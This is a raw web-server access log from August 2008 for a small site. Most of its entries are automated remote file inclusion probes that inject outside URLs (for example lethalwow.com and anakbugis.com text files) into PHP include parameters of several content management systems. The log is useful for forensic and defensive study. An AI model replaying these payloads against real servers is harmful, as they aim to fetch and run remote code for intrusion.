67.195.37.124 - - [03/Aug/2008:19:39:08 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.mathstamps.com"
67.18.151.242 - - [03/Aug/2008:19:40:09 -0700] "GET /contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.lethalwow.com/akon/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
67.195.37.124 - - [03/Aug/2008:19:40:40 -0700] "GET /?D=A HTTP/1.0" 200 763 "-" "Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.4) Gecko/20080721 BonEcho/2.0.0.4" "www.mathstamps.com"
74.53.240.146 - - [03/Aug/2008:19:42:03 -0700] "GET /logs/access_080630.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.proostjes.be/calendar/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
74.53.240.146 - - [03/Aug/2008:19:42:03 -0700] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.proostjes.be/calendar/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
74.53.240.146 - - [03/Aug/2008:19:42:04 -0700] "GET /logs/access_080707.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.proostjes.be/calendar/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
74.53.240.146 - - [03/Aug/2008:19:45:27 -0700] "GET /logs/access_080630.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.proostjes.be/calendar/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
74.53.240.146 - - [03/Aug/2008:19:45:27 -0700] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.proostjes.be/calendar/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
74.53.240.146 - - [03/Aug/2008:19:45:28 -0700] "GET /logs/access_080707.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.proostjes.be/calendar/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
74.53.240.146 - - [03/Aug/2008:19:47:18 -0700] "GET /logs/access_080630.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.proostjes.be/calendar/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
74.53.240.146 - - [03/Aug/2008:19:47:18 -0700] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.proostjes.be/calendar/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
74.53.240.146 - - [03/Aug/2008:19:47:19 -0700] "GET /logs/access_080707.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.proostjes.be/calendar/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
67.18.151.242 - - [03/Aug/2008:19:48:38 -0700] "GET /logs/access_080630.log/contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.lethalwow.com/akon/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
67.18.151.242 - - [03/Aug/2008:19:48:38 -0700] "GET /contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.lethalwow.com/akon/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
81.169.158.65 - - [03/Aug/2008:19:48:39 -0700] "GET /logs/access_080707.log//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://anakbugis.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
67.18.151.242 - - [03/Aug/2008:19:48:39 -0700] "GET /logs/contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.lethalwow.com/akon/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
67.18.151.242 - - [03/Aug/2008:19:48:40 -0700] "GET /logs/access_080707.log/contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.lethalwow.com/akon/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
69.13.27.210 - - [03/Aug/2008:19:51:13 -0700] "GET //?path%5Bdocroot%5D=http://www.askafriend.com/bookmarks/logs/safe.txt? HTTP/1.1" 200 779 "-" "libwww-perl/5.79" "www.mathstamps.com"
200.126.108.198 - - [03/Aug/2008:19:52:32 -0700] "GET /logs/access_080630.log/contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.gybog.com//robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.mathstamps.com"
200.126.108.198 - - [03/Aug/2008:19:52:32 -0700] "GET /contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.gybog.com//robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.mathstamps.com"
200.126.108.198 - - [03/Aug/2008:19:52:33 -0700] "GET /logs/contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.gybog.com//robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.mathstamps.com"
200.126.108.198 - - [03/Aug/2008:19:52:34 -0700] "GET /logs/access_080707.log/contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.gybog.com//robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.mathstamps.com"
213.254.226.234 - - [03/Aug/2008:19:53:05 -0700] "GET /logs/access_080707.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.dpfbrasil.net63.net/i.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
213.254.226.234 - - [03/Aug/2008:19:53:06 -0700] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.dpfbrasil.net63.net/i.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
213.254.226.234 - - [03/Aug/2008:19:53:06 -0700] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.dpfbrasil.net63.net/i.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
208.116.39.133 - - [03/Aug/2008:19:53:23 -0700] "GET /logs/access_080609.log/index.php?option=com_performs&task=rss&Itemid=&mosConfig_absolute_path=http://www.alphalai.com/plugins/payment/secpay/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
85.214.41.164 - - [03/Aug/2008:19:54:36 -0700] "GET /public/displayCategory.php?basepath=http://www.orbitalcomics.com/idd.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.mathstamps.com"
85.214.41.164 - - [03/Aug/2008:19:54:36 -0700] "GET /logs/public/displayCategory.php?basepath=http://www.orbitalcomics.com/idd.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.mathstamps.com"
200.126.108.198 - - [03/Aug/2008:19:57:35 -0700] "GET /logs/access_080630.log/contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.gybog.com//robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.mathstamps.com"
200.126.108.198 - - [03/Aug/2008:19:57:36 -0700] "GET /contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.gybog.com//robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.mathstamps.com"
200.126.108.198 - - [03/Aug/2008:19:57:36 -0700] "GET /logs/contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.gybog.com//robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.mathstamps.com"
200.126.108.198 - - [03/Aug/2008:19:57:38 -0700] "GET /logs/access_080707.log/contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.gybog.com//robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.mathstamps.com"
200.14.46.18 - - [03/Aug/2008:19:57:56 -0700] "GET /logs/access_080630.log/contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.gybog.com//robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
200.14.46.18 - - [03/Aug/2008:19:57:56 -0700] "GET /contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.gybog.com//robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
200.14.46.18 - - [03/Aug/2008:19:57:57 -0700] "GET /logs/contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.gybog.com//robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
200.14.46.18 - - [03/Aug/2008:19:57:58 -0700] "GET /logs/access_080707.log/contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.gybog.com//robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
200.14.46.18 - - [03/Aug/2008:19:58:55 -0700] "GET /contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.gybog.com//robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
200.14.46.18 - - [03/Aug/2008:19:58:59 -0700] "GET /logs/contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.gybog.com//robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
200.14.46.18 - - [03/Aug/2008:19:58:59 -0700] "GET /logs/access_080707.log/contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.gybog.com//robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
217.20.175.69 - - [03/Aug/2008:20:01:00 -0700] "GET //?path%5Bdocroot%5D=http://www.askafriend.com/bookmarks/logs/safe.txt? HTTP/1.1" 200 779 "-" "libwww-perl/5.805" "www.mathstamps.com"
70.88.226.121 - - [03/Aug/2008:20:02:42 -0700] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.richandrowdyretirement.com/rss.php/index.php/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
69.13.27.210 - - [03/Aug/2008:20:02:57 -0700] "GET /logs/access_080707.log//?path%5Bdocroot%5D=http://www.askafriend.com/bookmarks/logs/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
69.13.27.210 - - [03/Aug/2008:20:02:58 -0700] "GET /logs//?path%5Bdocroot%5D=http://www.askafriend.com/bookmarks/logs/safe.txt? HTTP/1.1" 200 4947 "-" "libwww-perl/5.79" "www.mathstamps.com"
69.13.27.210 - - [03/Aug/2008:20:03:05 -0700] "GET /logs/access_080505.log//?path%5Bdocroot%5D=http://www.askafriend.com/bookmarks/logs/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
74.6.8.122 - - [03/Aug/2008:20:11:51 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "mathstamps.com"
74.6.8.122 - - [03/Aug/2008:20:11:52 -0700] "GET /?S=A HTTP/1.0" 200 763 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "mathstamps.com"
85.214.41.164 - - [03/Aug/2008:20:12:32 -0700] "GET /logs/config.php?path[docroot]=http://www.orbitalcomics.com/idd.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.mathstamps.com"
85.214.41.164 - - [03/Aug/2008:20:12:33 -0700] "GET /config.php?path[docroot]=http://www.orbitalcomics.com/idd.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.mathstamps.com"
70.88.226.121 - - [03/Aug/2008:20:14:17 -0700] "GET /logs/access_080630.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.richandrowdyretirement.com/rss.php/index.php/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
70.88.226.121 - - [03/Aug/2008:20:14:18 -0700] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.richandrowdyretirement.com/rss.php/index.php/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
70.88.226.121 - - [03/Aug/2008:20:14:18 -0700] "GET /logs/access_080707.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.richandrowdyretirement.com/rss.php/index.php/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
64.185.237.77 - - [03/Aug/2008:20:14:41 -0700] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
217.20.175.69 - - [03/Aug/2008:20:14:54 -0700] "GET /logs/access_080707.log//?path%5Bdocroot%5D=http://www.askafriend.com/bookmarks/logs/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
217.20.175.69 - - [03/Aug/2008:20:14:54 -0700] "GET /logs//?path%5Bdocroot%5D=http://www.askafriend.com/bookmarks/logs/safe.txt? HTTP/1.1" 200 4947 "-" "libwww-perl/5.805" "www.mathstamps.com"
217.20.175.69 - - [03/Aug/2008:20:15:02 -0700] "GET /logs/access_080505.log//?path%5Bdocroot%5D=http://www.askafriend.com/bookmarks/logs/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
205.212.166.219 - - [03/Aug/2008:20:15:38 -0700] "GET /index2.php?config=http://www.freewebs.com/albgroup/1d/vid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
205.212.166.219 - - [03/Aug/2008:20:15:38 -0700] "GET /logs/index2.php?config=http://www.freewebs.com/albgroup/1d/vid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
205.212.166.219 - - [03/Aug/2008:20:15:39 -0700] "GET /index2.php?config=http://www.freewebs.com/albgroup/1d/vid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
205.212.166.219 - - [03/Aug/2008:20:15:39 -0700] "GET /logs/access_080623.log/index2.php?config=http://www.freewebs.com/albgroup/1d/vid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
205.212.166.219 - - [03/Aug/2008:20:15:39 -0700] "GET /logs/index2.php?config=http://www.freewebs.com/albgroup/1d/vid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
205.212.166.219 - - [03/Aug/2008:20:15:39 -0700] "GET /logs/access_080623.log/index2.php?config=http://www.freewebs.com/albgroup/1d/vid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
146.155.63.15 - - [03/Aug/2008:20:16:06 -0700] "GET /logs/access_080526.log//admin/spaw/spaw_control.class.php?spaw_root=http://www.ukspoznan.ovh.org/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.mathstamps.com"
146.155.63.15 - - [03/Aug/2008:20:16:06 -0700] "GET //admin/spaw/spaw_control.class.php?spaw_root=http://www.ukspoznan.ovh.org/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.mathstamps.com"
146.155.63.15 - - [03/Aug/2008:20:16:06 -0700] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://www.ukspoznan.ovh.org/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.mathstamps.com"
146.155.63.15 - - [03/Aug/2008:20:16:06 -0700] "GET /logs/access_080630.log//admin/spaw/spaw_control.class.php?spaw_root=http://www.ukspoznan.ovh.org/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.mathstamps.com"
216.183.105.230 - - [03/Aug/2008:20:16:13 -0700] "GET /logs/access_080623.log/index2.php?config=http://www.freewebs.com/albgroup/1d/vid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.mathstamps.com"
216.183.105.230 - - [03/Aug/2008:20:16:13 -0700] "GET /index2.php?config=http://www.freewebs.com/albgroup/1d/vid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.mathstamps.com"
216.183.105.230 - - [03/Aug/2008:20:16:13 -0700] "GET /logs/index2.php?config=http://www.freewebs.com/albgroup/1d/vid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.mathstamps.com"
193.239.211.19 - - [03/Aug/2008:20:16:37 -0700] "GET //newspublish/include.php?path[docroot]=http://institut-tibetain.org/cms/tmp/configs/v6id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
193.239.211.19 - - [03/Aug/2008:20:16:37 -0700] "GET /logs//newspublish/include.php?path[docroot]=http://institut-tibetain.org/cms/tmp/configs/v6id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
193.239.211.19 - - [03/Aug/2008:20:16:37 -0700] "GET /logs/access_080505.log//newspublish/include.php?path[docroot]=http://institut-tibetain.org/cms/tmp/configs/v6id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
64.38.220.15 - - [03/Aug/2008:20:16:48 -0700] "GET /logs/access_080623.log/index2.php?config=http://www.freewebs.com/albgroup/1d/vid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
64.38.220.15 - - [03/Aug/2008:20:16:48 -0700] "GET /index2.php?config=http://www.freewebs.com/albgroup/1d/vid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
64.38.220.15 - - [03/Aug/2008:20:16:48 -0700] "GET /index2.php?config=http://www.freewebs.com/albgroup/1d/vid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
64.38.220.15 - - [03/Aug/2008:20:16:48 -0700] "GET /logs/index2.php?config=http://www.freewebs.com/albgroup/1d/vid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
64.38.220.15 - - [03/Aug/2008:20:16:48 -0700] "GET /logs/index2.php?config=http://www.freewebs.com/albgroup/1d/vid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
64.38.220.15 - - [03/Aug/2008:20:16:48 -0700] "GET /logs/access_080623.log/index2.php?config=http://www.freewebs.com/albgroup/1d/vid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
207.158.11.4 - - [03/Aug/2008:20:18:04 -0700] "GET /logs/access_080623.log/index2.php?config=http://www.freewebs.com/albgroup/1d/vid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.mathstamps.com"
207.158.11.4 - - [03/Aug/2008:20:18:04 -0700] "GET /index2.php?config=http://www.freewebs.com/albgroup/1d/vid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.mathstamps.com"
207.158.11.4 - - [03/Aug/2008:20:18:04 -0700] "GET /logs/index2.php?config=http://www.freewebs.com/albgroup/1d/vid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.mathstamps.com"
67.195.37.124 - - [03/Aug/2008:20:23:40 -0700] "GET /logs/access_080317.log HTTP/1.0" 200 183636 "-" "Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.4) Gecko/20080721 BonEcho/2.0.0.4" "www.mathstamps.com"
24.47.133.61 - - [03/Aug/2008:20:24:32 -0700] "GET /logs/access_080609.log/errors.php?error=http://81.169.165.90/indo/dosiris.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.mathstamps.com"
24.47.133.61 - - [03/Aug/2008:20:24:32 -0700] "GET /errors.php?error=http://81.169.165.90/indo/dosiris.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.mathstamps.com"
24.47.133.61 - - [03/Aug/2008:20:24:32 -0700] "GET /logs/access_080421.log/errors.php?error=http://81.169.165.90/indo/dosiris.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.mathstamps.com"
24.47.133.61 - - [03/Aug/2008:20:24:32 -0700] "GET /logs/errors.php?error=http://81.169.165.90/indo/dosiris.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.mathstamps.com"
209.97.201.148 - - [03/Aug/2008:20:24:37 -0700] "GET /logs/access_080421.log/errors.php?error=http://www.hvn.es/aplicaciones/contratacion2/mbtPdfAsm/out/deflate.o.LCK?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
209.97.201.148 - - [03/Aug/2008:20:24:37 -0700] "GET /errors.php?error=http://www.hvn.es/aplicaciones/contratacion2/mbtPdfAsm/out/deflate.o.LCK?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
209.97.201.148 - - [03/Aug/2008:20:24:37 -0700] "GET /logs/errors.php?error=http://www.hvn.es/aplicaciones/contratacion2/mbtPdfAsm/out/deflate.o.LCK?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
209.97.201.148 - - [03/Aug/2008:20:24:38 -0700] "GET /logs/access_080609.log/errors.php?error=http://www.hvn.es/aplicaciones/contratacion2/mbtPdfAsm/out/deflate.o.LCK?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
77.92.80.1 - - [03/Aug/2008:20:26:33 -0700] "GET /logs/access_080616.log/NuclearBB/tasks/send_queued_emails.php?root_path=http://anakbugis.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
77.92.80.1 - - [03/Aug/2008:20:26:34 -0700] "GET /NuclearBB/tasks/send_queued_emails.php?root_path=http://anakbugis.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
77.92.80.1 - - [03/Aug/2008:20:26:34 -0700] "GET /logs/NuclearBB/tasks/send_queued_emails.php?root_path=http://anakbugis.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
77.92.80.1 - - [03/Aug/2008:20:26:55 -0700] "GET /logs/access_080616.log/NuclearBB/tasks/send_queued_emails.php?root_path=http://anakbugis.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
77.92.80.1 - - [03/Aug/2008:20:26:56 -0700] "GET /NuclearBB/tasks/send_queued_emails.php?root_path=http://anakbugis.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
77.92.80.1 - - [03/Aug/2008:20:26:56 -0700] "GET /logs/NuclearBB/tasks/send_queued_emails.php?root_path=http://anakbugis.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
24.91.36.151 - - [03/Aug/2008:20:28:15 -0700] "GET /logs/access_080421.log/errors.php?error=http://81.169.165.90/indo/dosiris.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.mathstamps.com"
77.92.80.1 - - [03/Aug/2008:20:28:30 -0700] "GET /logs/access_080512.log/NuclearBB/tasks/send_queued_emails.php?root_path=http://anakbugis.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
66.135.59.180 - - [03/Aug/2008:20:28:37 -0700] "GET /logs/access_080707.log//config/dbutil.bck.php?confdir=http://www.ukspoznan.ovh.org/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
66.135.59.180 - - [03/Aug/2008:20:28:37 -0700] "GET //config/dbutil.bck.php?confdir=http://www.ukspoznan.ovh.org/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
66.135.59.180 - - [03/Aug/2008:20:28:37 -0700] "GET /logs//config/dbutil.bck.php?confdir=http://www.ukspoznan.ovh.org/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
66.135.59.180 - - [03/Aug/2008:20:28:38 -0700] "GET /logs/access_080609.log//config/dbutil.bck.php?confdir=http://www.ukspoznan.ovh.org/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
77.92.80.1 - - [03/Aug/2008:20:28:38 -0700] "GET /logs/access_080512.log/NuclearBB/tasks/send_queued_emails.php?root_path=http://anakbugis.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
74.200.78.44 - - [03/Aug/2008:20:28:40 -0700] "GET /logs/access_080707.log//config/dbutil.bck.php?confdir=http://www.ukspoznan.ovh.org/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
74.200.78.44 - - [03/Aug/2008:20:28:40 -0700] "GET //config/dbutil.bck.php?confdir=http://www.ukspoznan.ovh.org/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
74.200.78.44 - - [03/Aug/2008:20:28:40 -0700] "GET /logs//config/dbutil.bck.php?confdir=http://www.ukspoznan.ovh.org/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
74.200.78.44 - - [03/Aug/2008:20:28:41 -0700] "GET //config/dbutil.bck.php?confdir=http://www.ukspoznan.ovh.org/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
74.200.78.44 - - [03/Aug/2008:20:28:41 -0700] "GET /logs/access_080707.log//config/dbutil.bck.php?confdir=http://www.ukspoznan.ovh.org/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
74.200.78.44 - - [03/Aug/2008:20:28:42 -0700] "GET /logs/access_080609.log//config/dbutil.bck.php?confdir=http://www.ukspoznan.ovh.org/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
74.200.78.44 - - [03/Aug/2008:20:28:42 -0700] "GET /logs//config/dbutil.bck.php?confdir=http://www.ukspoznan.ovh.org/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
74.200.78.44 - - [03/Aug/2008:20:28:42 -0700] "GET /logs/access_080609.log//config/dbutil.bck.php?confdir=http://www.ukspoznan.ovh.org/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
24.91.36.151 - - [03/Aug/2008:20:29:33 -0700] "GET /logs/access_080421.log/errors.php?error=http://81.169.165.90/indo/dosiris.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.mathstamps.com"
